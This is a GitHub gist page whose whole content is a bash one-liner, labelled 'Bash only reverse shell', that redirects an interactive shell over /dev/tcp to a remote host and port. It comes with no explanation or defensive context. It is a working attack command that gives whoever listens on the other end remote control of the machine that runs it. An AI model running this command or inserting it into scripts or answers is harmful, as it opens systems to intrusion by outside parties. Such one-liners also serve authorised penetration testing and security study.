Skip to content

Instantly share code, notes, and snippets.

@john-g-g
Created December 19, 2013 15:16
Show Gist options
  • Save john-g-g/8040755 to your computer and use it in GitHub Desktop.
Save john-g-g/8040755 to your computer and use it in GitHub Desktop.
Bash only reverse shell
bash -i >& /dev/tcp/$HOST/$PORT 0>&1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment